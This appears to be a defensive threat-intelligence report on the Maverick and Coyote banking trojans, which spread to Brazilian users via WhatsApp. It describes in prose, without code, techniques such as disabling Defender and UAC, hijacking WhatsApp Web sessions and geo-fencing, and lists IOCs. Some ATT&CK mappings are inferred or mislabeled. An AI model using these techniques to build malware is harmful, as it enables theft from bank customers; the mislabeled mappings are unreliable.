Full Report
Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via WhatsApp. According to a report from CyberProof, both malware strains are written in .NET, target Brazilian users and banks, and feature identical functionality to decrypt, targeting banking URLs and monitor banking applications.
Analysis Summary
# Tool/Technique: Maverick and Coyote Banking Malware
## Overview
Maverick is a newly disclosed banking malware closely related to the existing banking malware Coyote. Both malware strains are designed to target banking users in Brazil, leveraging social engineering via WhatsApp to propagate and ultimately steal financial credentials by monitoring banking application usage and URLs.
## Technical Details
- Type: Malware family (Banking Trojan)
- Platform: Windows (Inferred from LNK file execution, PowerShell, cmd.exe usage)
- Capabilities: Credential theft, self-propagation via WhatsApp Web, anti-analysis, system fingerprinting (targeting Brazil).
- First Seen: Maverick documented "early last month" (prior to the Nov 11, 2025 article date).
## MITRE ATT&CK Mapping
*Note: Mappings are based on described functionality and may not be exhaustive.*
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Initial ZIP/LNK delivery)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (Used for downloading payloads and disabling security features)
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder (Inferred, though specific persistence mechanism wasn't detailed in the excerpt beyond multi-vector persistence noted for the actor)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Obfuscated VBS downloader)
- T1055 - Process Injection (Potential, inferred by loader behavior)
- T1562 - Impair Defenses
- T1562.001 - Disable or Modify Tools (Disabling Microsoft Defender Antivirus)
- **TA0007 - Discovery**
- T1082 - System Information Discovery (Checking time zone, language, region to restrict execution to Brazil)
- **TA0008 - Lateral Movement** (Applicable to the SORVEPOTEL spreading component)
- T1091 - Inhibit System Recovery (Potentially via disabling security tools)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Communication with C2 server)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Banking Targeting:** Monitors active browser tabs for URLs matching hard-coded lists of Brazilian financial institutions.
- **Credential Theft:** Fetches phishing pages from a remote server to steal user credentials when a banking URL is detected.
- **Geo-fencing:** Restricts execution only to hosts verified to be located in Brazil (by checking time zone, language, region, and date/time format).
- **.NET Implantation:** Malware strains are written in the .NET framework.
### Advanced Features
- **WhatsApp Propagation (SORVEPOTEL/Maverick):** Hijacks WhatsApp Web sessions using ChromeDriver and Selenium to automatically download and distribute the malicious ZIP archive to all contacts.
- **Staged Execution:** Uses an obfuscated VBS downloader (`Orcamento.vbs`) and PowerShell (`tadeu.ps1`) to execute payloads in memory.
- **Security Disablement:** PowerShell script launches intermediate tools to disable Microsoft Defender Antivirus and User Account Control (UAC).
- **Anti-Analysis:** The .NET loader includes checks to self-terminate if reverse engineering tools are detected.
- **Command and Control (C2) Management:** The associated threat actor (Water Saci) uses a sophisticated C2 system allowing real-time management, including pausing, resuming, and monitoring the campaign.
## Indicators of Compromise
*Note: Specific file hashes, registry keys, and detailed network IOCs were not provided in the excerpt; the following are derived from the attack chain structure.*
- File Hashes: [Not specified]
- File Names: `Orcamento.vbs` (SORVEPOTEL/VBS downloader), ZIP archive containing the Maverick payload, LNK shortcut file.
- Registry Keys: [Not specified]
- Network Indicators: `zapgrande[.]com` (C2 server contact for first-stage payload download)
- Behavioral Indicators: Execution of `cmd.exe` or `PowerShell` triggered by an LNK file, automation scripts (ChromeDriver/Selenium) manipulating WhatsApp Web interface, system checks for Brazilian language/region settings.
## Associated Threat Actors
- **Water Saci:** Threat actor attributed by Trend Micro for using this attack chain, employing email-based C2 infrastructure and multi-vector persistence.
## Detection Methods
- Signature-based detection: Detection based on known static artifacts of the .NET executables (Coyote/Maverick).
- Behavioral detection: Monitoring for automation tools (Selenium/ChromeDriver) interacting with WhatsApp Web URLs, disabling security features via PowerShell, and checking system localization settings against expected values.
- YARA rules: Potential for YARA rules targeting the distinctive .NET logic or shared code overlaps between Coyote and Maverick.
## Mitigation Strategies
- **User Education:** Caution users against downloading and extracting unknown ZIP archives, especially those received via chat applications like WhatsApp, even from known contacts.
- **Endpoint Security:** Ensure robust endpoint detection and response (EDR) capable of detecting security tool disablement (Defender, UAC) via script execution.
- **Application Control:** Restrict the execution of unapproved PowerShell scripts or VBS files.
- **Security Hardening:** Address the potential for the malware groups to leverage WebDriver automation tools in unauthorized contexts.
## Related Tools/Techniques
- **Coyote:** A highly similar banking malware strain also targeting Brazilian users, suggesting Maverick may be a variant or evolution of Coyote.
- **SORVEPOTEL:** The component of the campaign responsible for initial delivery and self-propagation via WhatsApp Web hijacking.